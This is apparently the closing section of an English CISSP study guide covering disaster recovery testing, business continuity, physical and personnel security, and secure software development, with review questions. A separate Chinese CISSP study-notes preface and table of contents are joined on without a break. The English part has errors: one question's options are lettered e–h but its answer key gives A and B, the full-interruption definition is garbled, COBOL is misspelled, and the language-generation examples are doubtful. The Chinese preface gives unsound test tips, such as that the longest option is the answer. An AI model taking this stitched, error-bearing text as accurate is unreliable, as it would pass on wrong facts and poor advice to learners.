other high-level issues. In a read-through exercise, teams do not perform any recovery operations.  Walkthrough. A walkthrough is a more detailed read-through — the same teams look at the details of the recovery operations to look for errors, omissions or other problems.  Simulation. A simulation is a simulated disaster in which teams must go through their documented recovery operations. Simulations are very helpful to validate the detailed recovery plans and help the teams gain experience performing recovery operations.  Parallel. In a parallel recovery effort, teams perform recovery operations on a separate network, sometimes in a separate facility. Some organizations use third-party providers that provide recovery data centers to perform parallel recovery tests. Companies sometimes use a parallel recovery method to minimize disruption to their internal networks and minimize the need to maintain the IT infrastructure necessary to support recovery efforts.  Full interruption. In a full interruption recovery, the organizations halt regular operations on a separate network, sometimes in a separate facility. Many times, a full interruption operation involves failing over from the primary data center to the secondary data center. This type of recovery testing is the most expensive, takes the most time, and exposes the company to the most risk of something going wrong. While those drawbacks are serious, full interruption tests are a good practice for most organizations. 7.14 Participate in business continuity (BC) planning and exercises Business continuity includes disaster recovery, but it covers other things as well. Disaster recovery is a very specific series of processes to recovery from a disaster. Business continuity focuses on ensuring the business experiences minimal or no downtime (with the hope that a disaster recovery process won’t be needed). Think of business continuity as a strategy and disaster recovery as a tactic. The bullets below detail the steps required to plan business continuity. Note that these steps can be used to build a disaster recovery plan too.  Plan for an unexpected scenario. Form a team, perform a business impact analysis for your technologies, identify a budget and figure out which business processes are mission-critical.  Review your technologies. Set the recovery time objective and recovery point objective, develop a technology plan, review vendor support contracts, and create or review disaster recovery plans.  Build a communication plan. Finalize who needs to be contacted, figure out primary and alternative contact methods, and ensure that everybody can work, possibly from a backup location.  Coordinate with external entities. Work with relevant external entities, such as the police department, government agencies, partner companies and the community. 81 7.15 Implement and manage physical security Physical security represents securing your physical assets such as land, buildings, computers and other company property.  Perimeter security controls. The perimeter is the external facility surrounding your buildings or other areas, such as the space just outside of a data center. Two key considerations are access control and monitoring:  Access control. To maximize security, your facilities should restrict who can enter. This is often handled by key cards and card readers on doors. Other common methods are a visitor center or reception area with security guards and biometric scanners for entry (often required for data centers).  Monitoring. As part of your perimeter security, you should have a solution to monitor for anomalies. For example, if a door with a card reader is open for more than 60 seconds, it could indicate that it has been propped open. If a person scans a data center door with a badge but that badge wasn’t used to enter any other exterior door on that day, it could be a scenario to investigate — for example, maybe the card was stolen by somebody who gained access to the building through the air vents. A monitoring system can alert you to unusual scenarios and provide a historical look at your perimeter activities.  Internal security controls. Internal security focuses on limiting access to storage or supply rooms, filing cabinets, telephone closets, data centers and other sensitive areas. There are a couple of key methods to use:  Escort requirements. When a visitor checks in at your visitor center, you can require an employee escort. For example, maybe the visitor is required to always be with an employee and the guest badge does not open doors via the door card readers. Escort requirements are especially important for visitors who will be operating in sensitive areas (for example, an air conditioning company working on a problem in your data center).  Key and locks. Each employee should have the ability to secure company and personal belongings in their work space to help prevent theft. If they have an office, they should lock it when they aren’t in the office. If the employee has a desk or cubicle, they should have lockable cabinets or drawers for storing sensitive information and other valuables. 7.16 Address personnel safety and security concerns This section covers personnel safety — making sure employees can safely work and travel. While some of the techniques are common sense, others are less obvious.  Travel. The laws and policies in other countries can sometimes be drastically different than your own country. Employees must be familiar with the differences prior to traveling. For example, something you see as benign might be illegal and punishable by jail in another country. Other laws could make it difficult to do business in another country or put your company at risk. When traveling to other countries, you should familiarize yourself with the local laws to minimize danger to yourself and your company. Another key concern when traveling is protecting company data. To protect company data during travel, encryption should be used for both data in transit and data at rest. It is also a good practice (although impractical) to limit connectivity via wireless networks while traveling. Take your computing devices with you, when possible, since devices left in a hotel are subject to 82 tampering. In some cases, such as when traveling to high-risk nations, consider having personnel leave their computing devices at home. While this isn’t always feasible, it can drastically reduce the risk to personnel and company devices or data. In some organizations, employees are given a special travel laptop that has been scrubbed of sensitive data to use during a trip; the laptop is re-imaged upon return home.  Security training and awareness. Employees should be trained about how to mitigate potential dangers in the home office, while traveling or at home. For example, campus safety includes closing doors behind you, not walking to your car alone after hours, and reporting suspicious persons. Travel safety includes not displaying your company badge in public places and taking only authorized ride hailing services. Safety outside of work includes using a secure home network and not inserting foreign media into devices. While the training and awareness campaigns will differ, a key element is to have a campaign that addresses your organization’s particular dangers.  Emergency management. Imagine a large earthquake strikes your primary office building. The power is out, and workers have evacuated the buildings; many go home to check on their families. Other employees might be flying to the office for meetings the next day. You need to be able to find out if all employees are safe and accounted for; notify employees, partners, customers, and visitors; and initiate business continuity and/or disaster recovery procedures. An effective emergency management system enables you to send out emergency alerts to employees (many solutions rely on TXT or SMS messages to cellular phones), track their responses and locations, and initiate emergency response measures, such as activating a secondary data center or a contingent workforce in an alternate site.  Duress. Duress refers forcing somebody to perform an act that they normally wouldn’t, due to a threat of harm, such as a bank teller giving money to a bank robber who brandishes a weapon. Training personnel about duress and implementing countermeasures can help. For example, at a retail store, the last twenty-dollar bill in the cash register can be attached to a silent alarm mechanism; when an employee removes it for a robber, the silent alarm alerts the authorities. Another example is a building alarm system that must be deactivated quickly once you enter the building. If the owner of a business is met at opening time by a crook who demands that she deactivates the alarm, instead of entering her regular disarm code, the owner can use a special code that deactivates the alarm and notifies the authorities that it was disarmed under duress. In many cases, to protect personnel safety, it is a good practice to have personnel fully comply with all reasonable demands, especially in situations where the loss is a laptop computer or something similar. 83 Domain 7 Review Questions Read and answer the following questions. If you do not get one at least one of them correct, spend more time with the subject. Then move on to Domain 8. 1. You are conducting an analysis of a compromised computer. You figure out that the computer had all known security patches applied prior to the computer being compromised. Which two of the following statements are probably true about this incident? e. The company has a zero-day vulnerability. f. The company was compromised by a zero-day exploit. g. The computer does not have a configuration management agent. h. The computer does not have anti-malware. 2. You are investigating poor performance of a company’s telephone system. The company uses IP-based phones and reports that in some scenarios, such as when there is heavy use, the call quality drops and there are sometimes lags or muffling. You need to maximize the performance of the telephone system. Which technology should you use? a. System resilience b. Quality of service c. Fault tolerance d. Whitelisting e. Blacklisting f. Configuration management 3. You are preparing your company for disaster recovery. The company issues the following requirements for disaster recovery testing:  The company must have the ability to restore and recover to an alternate data center.  Restore and recovery operations must not impact your data center.  IT teams must perform recovery steps during testing. Which type of recovery should you use to meet the company’s requirements? a. Partial interruption b. Tabletop c. Full interruption d. Parallel 84 Answers to Domain 7 Review Questions 1. Answer: A, B Explanation: When a vulnerability exists but there is no patch to fix it, it is a zero-day vulnerability. When exploit code exists to take advantage of a zero-day vulnerability, it is called a zero-day exploit. In this scenario, because the computer was up to date on patches, we can conclude that there was a zero-day vulnerability and a zero-day exploit. 2. Answer: B Explanation: Quality of service provides priority service to a specified application or type of communication. In this scenario, call quality is being impacted by other services on the network. By prioritizing the network communication for the IP phones, you can maximize their performance (though that might impact something else). 3. Answer: D Explanation: The first key requirement in this scenario is that the data center must not be impacted by the testing. This eliminates the partial interruption and full interruption tests because those impact the data center. The other key requirement is that IT teams must perform recovery steps. This requirement eliminates the tabletop testing because tabletop testing involves walking through the plans, but not performing recovery operations. 85 Domain 8. Software Development Security This domain focuses on managing the risk and security of software development. Security should be a focus of the development lifecycle, and not an add-on or afterthought to the process. The development methodology and lifecycle can have a big effect on how security is thought of and implemented in your organization. The methodology also ties into the environment that the software is being developed for. Organizations should ensure that access to code repositories is limited to protect their investment in software development. Access and protection should be audited on a regular basis. You must also take into consideration the process of acquiring a development lifecycle, whether from another company, or picking up a development project that is already in progress. 8.1 Understand and integrate security throughout the software development lifecycle (SDLC) This section discusses the various methods and considerations when developing an application. The lifecycle of development does not typically have a final goal or destination. Instead, it is a continuous loop of efforts that must include steps at different phases of a project.  Development methodologies. There are many different development methodologies that organizations can use as part of the development lifecycle. The following table lists the most common methodologies and the key related concepts. Methodology Key Concepts Build and fix  Lacks a key architecture design  Problems are fixed as they occur  Lacks a formal feedback cycle  Reactive instead of proactive Waterfall  Linear sequential lifecycle  Each phase is completed before continuing  Lacks a formal way to make changes during a cycle  Project is completed before collecting feedback and starting again V-shaped  Based on the waterfall model  Each phase is complete before continuing  Allows for verification and validation after each phase  Does not contain a risk analysis phase Prototyping  Three main models:  Rapid prototyping uses a quick sample to test the current project.  Evolutionary prototyping uses incremental improvements to a design.  Operational prototypes provide incremental improvements, but are intended to be used in production. Incremental  Uses multiple cycles for development (think multiple waterfalls)  The entire process can restart at any time as a different phase  Easy to introduce new requirements 86  Delivers incremental updates to software Spiral  Iterative approach to development  Performs risk analysis during development  Future information and requirements are funneled into the risk analysis  Allows for testing early in development Rapid application development  Uses rapid prototyping  Designed for quick development  Analysis and design are quickly demonstrated  Testing and requirements are often revisited Agile  Umbrella term for multiple methods  Highlights efficiency and iterative development  User stories describe what a user does and why  Prototypes are filtered down to individual features  Maturity models. There are five maturity levels of the Capability Maturity Model Integration (CMMI): 1. Initial. The development process is ad hoc, inefficient, inconsistent and unpredictable. 2. Repeatable. A formal structure provides change control, quality assurance and testing. 3. Defined. Processes and procedures are designed and followed during the project. 4. Managed. Processes and procedures are used to collect data from the development cycle to make improvements. 5. Optimizing. There is a model of continuous improvement for the development cycle.  Operation and maintenance. After a product has been developed, tested and released, the next phase of the process is to provide operational support and maintenance of the released product. This can include resolving unforeseen problems or developing new features to address new requirements.  Change management. Changes can disrupt development, testing and release. An organization should have a change control process that includes documenting and understanding a change before attempting to implement it. This is especially true the later into the project the change is requested. Each change request must be evaluated for capability, risk and security concerns, impacts to the timeline, and more.  Integrated product team. Software development and IT have typically been two separate departments or groups within an organization. Each group typically has different goals: developers want to distribute finished code, and IT wants to efficiently manage working systems. With DevOps, these teams work together to align their goals so that software releases are consistent and reliable. 87 8.2 Identify and apply security controls in development environments The source code and repositories that make up an application can represent hundreds or thousands of hours of work and comprise important intellectual property for an organization. Organizations must be prepared to take multiple levels of risk mitigation to protect the code, as well as the applications.  Security of the software environments. Historically, security has been an afterthought or a bolt-on after an application has been developed and deployed, instead of a part of the lifecycle. When developing an application, considerations must be made for the databases, external connections and sensitive data that are being handled by the application.  Security weaknesses and vulnerabilities at the source-code level. The MITRE organization publishes a list of the 25 most dangerous software errors that can cause weaknesses and vulnerabilities in an application (http://cwe.mitre.org/top25/#Listing). For example, if an input field is not verified for content and length, then unexpected errors can occur. Additionally, if file access or encryption is lacking in an application, then users could potentially access information that they do not have permissions for. Code reviews, static analysis, testing and validation can all help mitigate risks in developing software.  Configuration management as an aspect of secure coding. The change control process should be tightly integrated with development to ensure that security considerations are made for any new requirements, features or requests. A centralized code repository helps in managing changes and tracking when and where revisions to the code. The repository can track versions of an application so you can easily roll back to a previous version if necessary.  Security of code repositories. The version control system that houses source code and intellectual property is the code repository. There might be different repositories for active development, testing and quality assurance. A best practice for securing code repositories is to ensure that they are as far away from the internet as possible, even if that means that they are on a separate internal network that does not have internet access. Any remote access to a repository should use a VPN or another secure connection method.  Security of application programming interfaces. There are five generations of programming languages. The higher the generation, the more abstract the language is and the less a developer needs to know about the details of the operating system or hardware behind the code. The five generations are: 1: Machine language. This is the binary representation that is understood and used by the computer processor. 2: Assembly language. Assembly is a symbolic representation of the machine-level instructions. Mnemonics represent the binary code, and commands such as ADD, PUSH and POP are used. The assemblers translate the code into machine language. 3: High-level language. High-level languages introduce the ability to use IF, THEN and ELSE statements as part of the code logic. The low-level system architecture is handled by the programming language. FORTRAN and COLBOL are examples of generation 3 programming languages. 88 4: Very high-level language. Generation 4 languages further reduce the amount of code that is required, so programmers can focus on algorithms. Python, C++, C# and Java are examples of generation 4 programming languages. 5: Natural language. Generation 5 languages enable a system to learn and change on its own, as with artificial intelligence. Instead of developing code with a specific purpose or goal, programmers only define the constraints and goal; the application then solves the problem on its own based on this information. Prolog and Mercury are examples of generation 5 programming languages. 8.3 Assess the effectiveness of software security Putting protections in place is not enough security to give you peace of mind. To know that those protections are working as designed, organizations should routinely audit their access protections. You should also revisit your implementations to identify new risks that might need to be mitigated, and to ensure that the project is meeting the requirements that were agreed upon.  Auditing and logging of changes. The processes and procedures for change control should be evaluated during an audit. Changes that are introduced in the middle of the development phase can cause problems that might not yet be discovered or caused in testing. The effectiveness of the change control methods should be an aspect of auditing the development phase.  Risk analysis and mitigation. Most of the development methodologies discussed in section 8.1 include a process to perform a risk analysis of the current development cycle. When a risk has been identified, a mitigation strategy should be created to avoid that risk. Additionally, you can document why a risk might be ignored or not addressed during a certain phase of the development process. 8.4 Assess security impact of acquired software When an organization merges with or purchases another organization, the acquired source code, repository access and design, and intellectual property should be analyzed and reviewed. The phases of the development cycle should also be reviewed. You should try to identify any new risks that have appeared by acquiring the new software development process. 8.5 Define and apply secure coding guidelines and standards Many organizations have a security strategy that is focused at the infrastructure level; it deals with things like network security, identity and access management, and endpoint security. Organizations that develop code internally should also include coding in their security strategy. They should specify practices for ensuring the security of the code as well as coding standards, such as the preferred programming language for particular use cases.  Security weaknesses and vulnerabilities at the source-code level. Just about every application (or chunk of source code) has bugs. While not all bugs are specifically related to security, they can sometimes lead to a security vulnerability. One effective way of finding and fixing bugs is to use source code analysis tools, which are also called static application security testing (SAST) tools. These tools are most effective during the software development 89 process, since it’s more difficult to rework code after it is in production. However, be aware that these tools can’t find many weaknesses and they introduce extra work for the teams, especially if they generate a lot of false positives. Today, with security being of paramount concern, the expectation is that all source code is scanned during development and after release into production.  Security of application programming interfaces. Application programming interfaces (APIs) enable applications to make calls to other applications. Without proper security, APIs are a perfect way for malicious individuals to compromise your environment or application. The security of APIs starts with requiring authentication using a method such as OAuth or API keys. Authorization should also be used and enforced. For example, one API key might enable you to read information but you need a separate API key to alter or write information. Many companies use an API security gateway to centralize API calls and perform checks on the calls (checking tokens, parameters, messages, etc.) to ensure they meet the organization’s requirements. Other common methods to secure your APIs is to use throttling (which protects against DoS or similar misuse), scan your APIs for weaknesses, and use encryption (such as with an API gateway).  Secure coding practices. There are established practices you should follow to maximize the security of your code. Some of the most common ones are:  Input validation. Validate input, especially from untrusted sources, and reject invalid input.  Don’t ignore compiler warnings. When compiling code, use the highest warning level available and address all warnings that are generated.  Deny by default. By default, everybody should be denied access. Grant access as needed.  Authentication and password management. Require authentication for everything that is not meant to be available to the public. Hash passwords and salt the hashes.  Access control. Restrict access using the principle of least privilege, and deny access if there are issues checking access control systems.  Cryptographic practices. Protect secrets and master keys by establishing and enforcing cryptographic standards for your organization.  Error handling and logging. Avoid exposing sensitive information in log files or error messages. Restrict access to logs.  Data protection. Encrypt sensitive information, everywhere.  Communication security. Use Transport Layer Security (TLS) everywhere possible.  System configuration. Lock down servers and devices. Keep software versions up to date with fast turnaround for security fixes. You can find good information for securing your servers and devices from NIST. Visit https://www.nist.gov to search for standards and guides related to your environment.  Memory management. Use input and output control, especially for untrusted data, and watch for buffer size issues (use static buffers). Free memory when it is no longer required. 90 Domain 8 Review Questions Read and answer the following questions. If you do not get one at least one of them correct, spend more time with the subject. 1. You are a software development manager starting a new development project. You want to focus the development process around user stories. The development process must be efficient and have multiple iterations as changes and requirements are discovered. Which development methodology should you use? a. Agile b. Waterfall c. Spiral d. Rapid application development 2. You are in the early stages of the development lifecycle and creating design requirements. The application will contain several forms that allow users to enter information to be saved in a database. The forms should require users to submit up to 200 alphanumeric characters, but should prevent certain strings. What should you perform on the text fields? a. Input validation b. Unit testing c. Prototyping d. Buffer regression 3. You plan on creating an artificial intelligence application that is based on constraints and an end goal. What generation language should you use for the development process? a. Generation 2 b. Generation 3 c. Generation 4 d. Generation 5 91 Answers to Domain 8 Review Questions 1. Answer: A Explanation: Agile development emphasizes efficiency and iterations during the development process. Agile focuses on user stories to work through the development process. 2. Answer: A Explanation: The text fields that the users interact with should have input validation to ensure that the character limit has not been exceeded and that no special characters that might cause database inconsistencies are used. 3. Answer: D Explanation: Generation 5 languages are associated with artificial intelligence. The constraints of the application and its goal are defined; then the program learns more on its own to achieve the goal. 92 Useful References Supplement your exam preparation or polish the attained certification by reviewing relevant resources.  Top Webcasts On IT Security And Compliance To Attend Or Watch Recorded While Earning CPE Credits  How to Build an Effective Data Classification Policy for Better Information Security  Five Reasons to Ditch Manual Data Classification Methods  10 Ways to Improve Automated Data Classification  SysAdmin Magazine: “My Precious!” — Finding & Securing Sensitive Data  How to Identify and Prioritize Information Security Risks  How to Perform IT Risk Assessment  SysAdmin Magazine: Assess Your Risks or Die Tryin’  Insider Threat Playbook: How to Deter Data Theft by Departing Employees  Five Ways to Reduce the Risk of Employee Theft of Confidential Information  Best Practices: How to Off-Board an Employee for Good  Best Practices: How to Minimize the Risk of Insider Threats  Insider Threat Detection: 10 Techniques for Top-to-Bottom Defense  Cyber Chief Magazine: Insider Threat — Uncover and Neutralize  Top 20 Critical Security Controls for Effective Cyber Defense  White Paper: Compliance Demystified  GDPR Rules of Data Breach Notification: How to Report Personal Data Loss and Avoid Fines?  SysAdmin Magazine: Why GDPR Won’t Kill You  Brace Yourself — HIPAA Security Risk Assessment Is at Your Door  White Paper: Seven Questions for Assessing Data Security in the Enterprise  Windows Server Hardening Checklist  Four Things You Should Never Store in Your Database  What to Know about the Threat of Privileged Users  Key Lessons Learned from Data Breaches Caused by Privilege Abuse  Best Practices: How to Harden Privileged Account Security  How to Collect Server Inventory  Best Practices: How to Implement Audit Policy 93 About the Author Brian Svidergol is focused on infrastructure and cloud-based solutions with a special emphasis on identity and access management. Brian has worked with numerous companies, from startups to Fortune 500 companies, helping them design and implement secure infrastructure and cloud solutions. He holds numerous industry certifications from Microsoft, Red Hat, VMware, Novell and NetApp. Brian has authored six books published through O’Reilly, Sybex, and Microsoft Press and self-published one book. About Netwrix Netwrix Corporation is a software company focused exclusively on providing IT security and operations teams with pervasive visibility into user behavior, system configurations and data sensitivity across hybrid IT infrastructures to protect data regardless of its location. Over 9,000 organizations worldwide rely on Netwrix to detect and proactively mitigate data security threats, pass compliance audits with less effort and expense, and increase the productivity of their IT teams. Founded in 2006, Netwrix has earned more than 140 industry awards and been named to both the Inc. 5000 and Deloitte Technology Fast 500 lists of the fastest growing companies in the U.S. For more information about Netwrix, visit www.netwrix.com. Netwrix Auditor is a visibility platform for user behavior analysis and risk mitigation that enables control over changes, configurations and access in hybrid IT environments to protect data regardless of its location. The platform delivers security intelligence to identify security holes, detect anomalies in user behavior and investigate threat patterns in time to prevent real damage. Netwrix Auditor includes applications for Active Directory, Azure AD, Exchange, Office 365, Windows file servers, EMC storage devices, NetApp filer appliances, SharePoint, Oracle Database, SQL Server, VMware and Windows Server. Empowered with a RESTful API and user activity video recording, the platform delivers visibility and control across all onpremises or cloud-based IT systems in a unified way. Learn more about Netwrix Auditor and download its free 20-day trial by visiting netwrix.com/go/freetrial. Corporate Headquarters: 300 Spectrum Center Drive, Suite 200, Irvine, CA 92618 Phone: 1-949-407-5125 Toll-free: 888-638-9749 EMEA: +44 (0) 203-588-3023 netwrix.com/social 非官方辅导资料,如有错漏、纯属正常。(作者 QQ/WeiChat:9201491) 基于 Official (ISC)2 Guide to the CISSP CBK,4 th英文版翻译(CBK_4) 根据 CISSP Official Study Guide,7 th(OSG_7)和 CISSP All-In-One Exam Guide,7 th(AIO_7)进行补充完善 参考 CISSP All-In-One Exam Guide,6 th(AIO_6)中文版规范措词 结合官方习题集、历年真题和 Certpass、TestKing 最新模拟题对考试要点、难点进行归纳 2017.02 版 —1— 目 录 前 言 .......................................................................................................................................................5 第一域 安全与风险管理(例如安全、风险、合规、法律、法规、业务连续性)................. 16 A.理解并应用保密性、完整性和可用性的概念...........................................................16 B.应用安全治理原则.................................................................................................17 C.合规......................................................................................................................20 D.在全球化背景下理解与信息安全相关的法律和法规问题..........................................21 E.理解职业道德........................................................................................................28 F.制定并实施文档化的安全策略、标准、程序和方针.................................................29 G.理解业务连续性要求..............................................................................................30 H.促进人员安全策略.................................................................................................33 I.理解与应用风险管理的概念 ...................................................................................35 J.理解与运用威胁建模..............................................................................................43 K 整合安全风险考量至采购策略与实践中...................................................................44 L.建立并管理信息安全教育、安全培训与安全意识....................................................45 第二域 资产安全 (保护资产的安全).......................................................................................... 47 A.信息与支持资产的分类(例如:敏感性、关键性).................................................47 B.确定并维护所有权(例如:数据所有者、系统所有者、业务/任务所有者) ............48 C.保护隐私...............................................................................................................50 D.确保适当的数据保留(例如: 介质、 硬件、人员).............................................51 E.确定数据安全控制措施(例如: 静态数据、 传输中数据)...................................51 F.建立处理要求(例如:敏感信息的标示、标记、存储和销毁) ...............................52 第三域 安全工程(管理工程与管理)............................................................................................ 53 A.利用安全设计原则实施和管理工程过程..................................................................53 B.理解安全模型的基础概念(例如:保密性、完整性、多层模型)............................54 C.基于系统安全评估模型选择控制措施和对策...........................................................61 —2— D.理解信息系统的安全能力(存储保护、虚拟化、可信平台模块、接口、容错).......65 E.评估与缓解安全架构、设计和解决方案要素的脆弱性.............................................65 F.评估和减缓基于 Web 系统的脆弱性(例如:XML,OWASP)........................................74 G.评估和减缓移动系统的脆弱性................................................................................76 H.评估和减缓嵌入式设备和网络物理系统的脆弱性(可启用网络设备、物联网).......77 I.应用密码学 ...........................................................................................................77 J.应用安全原则于场地与设施设计(遵循安全原则设计场地和设施) ........................95 K.设计和实施物理安全..............................................................................................97 第四域 通信与网络安全 (设计及保护网络安全)...................................................................103 A.应用安全设计原则于网络架构(例如:IP 协议与非 IP 协议,网络分段).............103 B.保护网络组件安全...............................................................................................121 C.设计与建立安全通信信道.....................................................................................126 D.预防和减缓网络攻击............................................................................................141 第五域 身份与访问管理 (访问控制与身份管理)...................................................................144 A.控制资产的物理与逻辑访问 .................................................................................144 B.管理人员与设备的身份和验证..............................................................................145 C.整合身份即服务(如云身份)..............................................................................162 D.整合第三方身份服务(例如:内部部署) ............................................................163 E.实施和管理授权机制(授权机制的实现与管理)..................................................163 F.预防与减缓访问控制攻击.....................................................................................167 G.管理身份与访问供给生命周期(如供给、审查)..................................................170 第六域 安全评估与测试(设计、执行与分析安全测试).........................................................171 A.设计和验证评估与测试策略 .................................................................................171 B.执行安全控制测试...............................................................................................172 C.收集安全流程数据(例如: 管理和运营控制措施).............................................178 —3— D.分析与报告测试结果(例如:自动、手动).........................................................180 E.开展或促进内部和第三方审计..............................................................................180 第七域 安全运营(例如:基础概念、调查、事件管理、灾难恢复)....................................182 A.理解与支持调理/知道什么是调查取证..................................................................182 B.理解调查类型的要求............................................................................................186 C.实施日志和监测活动(行为记录和监控活动) .....................................................187 D.保护资源的供给安全(通过配置管理确保资源的供应和安全) .............................191 E.理解与应用安全运营的基础概念 ..........................................................................193 F.利用资源保护技术...............................................................................................197 G.开展事件管理(实施事件响应) ..........................................................................198 H.操作和维护预防措施............................................................................................203 I.实施和支持补丁与漏洞管理 .................................................................................207 J.参与和理解变更管理流程(例如:版本控制、基线化、安全性影响分析)............207 K.实施恢复策略......................................................................................................208 L.实施灾难恢复流程...............................................................................................214 M.测试灾难恢复计划...............................................................................................215 N.参与业务连续性计划和演练 .................................................................................217 O.实施和管理物理安全............................................................................................220 P.参与解决人员安全问题(例如胁迫、旅行、监控)...............................................223 第八域 软件开发安全(理解、应用与执行软件安全).............................................................224 A.理解安全并将其应用于软件开发生命周期 ............................................................224 B.在开发环境中执行安全控制 .................................................................................241 C.评估软件安全的有效性........................................................................................259 D.评估采购软件的安全影响.....................................................................................263 第九域 考试重难点归纳...................................................................................................................264 —4— A.新旧大纲对比......................................................................................................264 B.官方教材要点汇总...............................................................................................264 C.法规标准汇总......................................................................................................264 E.攻击方法汇总......................................................................................................283 —5— 前 言 (ISC) 2是一个注册商标,读作 ISC-Squared,是 6 个首写字母 IISSCC 的缩记,其全名是: The International Information Systems Security Certification Consortium,中文名是: 国际信息系统安全认证联盟。它是全球最大的信息、网络、软件与基础设施安全认证会员制非 营利组织,是 CISSP 认证考试的管理机构。 一、考试介绍 CISSP 考试是面向管理的,技术要求并不高,但要求知识面广,即“一英尺深一英里宽”。 1.考试的特点 ①全面。8 个域的内容什么都会考,随机抽取,没有重点,但是有的知识域(章节)出题 权重(数量)比较多。从准备角度来看,必须掌握大纲、教材或辅导书里的全部知识点;从做题 角度来看,押题或收集真题是没必要也没意义的,官方的章节练习题、测试习题都很好的覆盖 了知识点以及题型,且考试不会出现曾经做过的一样的题,但做好了习题集就一定能过。 ②基础。考试没有技术难度大的分析,不研究具体的算法和协议,只要求理解各种模型、 标准、算法、协议、流程的优缺点、应用方法与要求等,有计算机基础的人肯定看得懂。目的 是知道该用什么技术来解决什么问题,而不是钻研某个技术的详细实现。大量考题都是在一个 设定的场景里考基本的理论。 ③有限。考试内容一定在 CBK 或者官方指定教材中,绝不会超出;据不完全统计,按照考 试大纲,8 个域共有 65 个章节(模块)、198 个小节(要点)、1486 个知识点(考点)。 ④交叉。大部分知识点并不是独立的,是互相关联、综合运用的,必须通过反复阅读和归 纳总结来理清关系,建立知识体系,清晰的掌握相关联知识的应用领域、应用场景和方法。 ⑤离散。CISSP 的通过率不高,不是我们不聪明,是没有中文版本的成体系的、全套的、 完善的教材、辅导书和习题集,而且任何一本书都没有 100%的覆盖和详细描述 1486 个知识点, 也没有把各章节的知识点关系串联起来,准备考试要花大量的时间去收集资料、梳理资料、理 解资料、形成笔记,而且好资料全是英文版本的(中文的除了 AIO_6 和 OSG_7,其它的翻译都 很滥,习题翻译更烂)。现在知识点都整理好了,过与不过全看你做了没做。 ⑥跑偏。考试中出现的难题,一般是教材中没有详细讲述但 CBK 里有列举的知识点,或者 是自己了解比较少的、不常用的标准/法规/协议/模型/流程等内容,总之要想考过,必须老老 实实花时间来积累知识,攻克隐晦难懂的外国的标准/法规/协议/模型/流程。这里要强调的一 点就是:不管你是科班出身还是半路出家,CISSP 对都是一个全新的知识领域,很多内容是可 以和工作经验相关联,但绝不是你曾经学过的那些技术知识,一定要研究透它的知识体系。 ⑦易错。做错题一般不是因为自己技术不好、理论不扎实,而是因为:看错题干;对自己 工作领域以外的知识掌握不牢;按经验做题,没理解题目的出处、原文或考的知识点是什么; 没建立知识体系、不理解美国思维,肯定会错;英文不好,不能从超滥的中文翻译反推出英语 原文,肯定会错(看不懂英文原题也肯定会错);逻辑不清晰、思考不仔细肯定会错(做完一 半/150 题/3 小时,大脑就疲劳了)。考题的很多技巧与英语六级阅读理解题是完全一致的, 必须理解题目的知识点、回忆到教材的原文出处,千万别扫一眼题目和答案就胸有成竹的作出 选择,要看清问的是什么,考的是哪个知识点,所以英语阅读理解的技巧是同样适用的,如: —6— 有 any、only、every、must 等绝对性的描述肯定不对;文字最长的选项就是答案;在对立的 选项里 2 选 1;字面很像的选项很可能是干扰项等等。 ⑧没用。应试和运用是完全不同的,考过了这个证还是什么都不会,仍然成不了技术专家; 当然,有这个公认的含金量高的认证,是一种认可,方便找工作和升职,而且学习过程可以梳 理构建自己的知识体系,知道如何构建和运营一个完善的安防体系,也能结交人脉,对于提升 综合能力有很大帮助。就像考驾照一样,考过了就有资格开车上路了,但你还是不敢马上独立 跑高速、跑长途,必须搞台车练练手,才能成为老司机;相反,很多老司机常年跑车,但让他 去再考一次驾照,不好好准备肯定过不了。技术高手不需要证书来证明,而且技术高手考试的 通过率还都不高,因为他没有掌握考试的精髓。相反,管理人员的通过率高些。 2.通过考试的必要条件 ①信息。自己收集、整理相关的资讯和学习资料;搞清楚怎么约考、怎么背书、怎么维持 CPE 就行了;很多收费的资料都可以在网上找到免费的下载,但资料搞全后,就没必要浪费时 间上网了(其实是在看电影、打游戏),需要上的网站只有几个,在汇编资料里有网址。 ②精读。选择最新最全的 1 到 2 本教材,理解到每一句话,必须总结归纳出自己的学习笔 记,该宝典就是作者边学边记的,不整理自己的笔记,就不能牢固的建立起自己的知识体系, 碰到题目就不能快速查找资料,就没有一个辅助复习和方便查阅的知识要点集。这是一个从薄 到厚,再从厚到薄的过程。 ③做题。很多考点书上讲的不多、不全、不细,全靠做题来巩固。而且必须通过做题来理 解它的出题思路和答题技巧。作者因为记忆差,考前把 8000 多道题反复做了 4 遍,复习半年 后,3 小时可以轻松做 250 道题;当然,绝世高手可能不做题也能过。 ④英语。看中文效率最高,以中文为主来看书是可以的,但最好扎扎实实看点英文资料, 做大量英文题,因为很多考题的翻译很烂,需要看英文术语、用英文思维才能准确理解题干、 判断混淆项和最佳项,而且考试真题的简体中文翻译也不符合我们平时学习的思维和表述。作 者的知识体系全是用中文建立的,但做题只做英文题,做中文题实在难受,还会产生误解。建 议:主看中文书学得最快,辅看英文书加深理解,只做英文题准确无误。 ⑤培训。通过考试只能靠自己大量的学习和积累,培训班的作用是提供最新的中文资料, 提供答疑、报名、背书和 CPE 维持服务,并不能用五天时间把知识全部塞进你的大脑,但可以 介绍方法、思路、规则,提高你的学习效率,节省收集、整理的时间。其实,作者和身边的同 事是同时参加了谷安、汇哲、爱思考、天融信的几个培训班,算是搞明白了,不过如此。我身 边的人很多都没有时间听完全部的培训课程,而在线视频更是没一个人完整看下来了,我自己 几十 G 的视音频资料从没看过,只要看 3 本书,做几千道题就够了。有了葵花宝典,你可以自 己积累,钻研半年你也可以成为讲师了,不报班也能过。 报还是不报培训班,是个很纠结的问题,这里多说几句。如果有钱,肯定是报,某培训班 研究 CISSP 很深入,全程服务也很细致。如果没钱,自学也完全可以通过,只是后续背书、CPE 维持挺烦琐的。还是举考驾照这个例子:现在国家新政策允许自学考驾照,不用再报驾校了, 如果有一台车练手,按教程练肯定能不花钱轻松考到驾照,但如果对考场规则和流程不熟,而 后续还有违章处理、上牌年审、保险理培什么的事,自己搞定是省钱了但费时伤神,花钱搞就 省心了。不管报不报,花点小钱把资料搞齐还是可以的,相当于有台练手车,等熟练了,再决 —7— 定下一步怎么搞。 ⑥自信。别想作弊、代考、押题什么的旁门左道了,从事安全行业,尤其是进入高层,必 须具备最基本的职业道德和个人素养。 ⑦时间。万事俱备,就差积累,最好封闭式学习,排除干扰,作者白天上班,晚上陪小孩 家教再哄小孩睡觉,半夜 11 点到凌晨 2 点学习,坚持了 8 个月。 ⑧评测。3 次闭卷模拟测试全部 80%正确率以上,就可以考试了。(有的培训班题目比较 老旧,会要求学员模拟测试 90 分以上才能正式考) 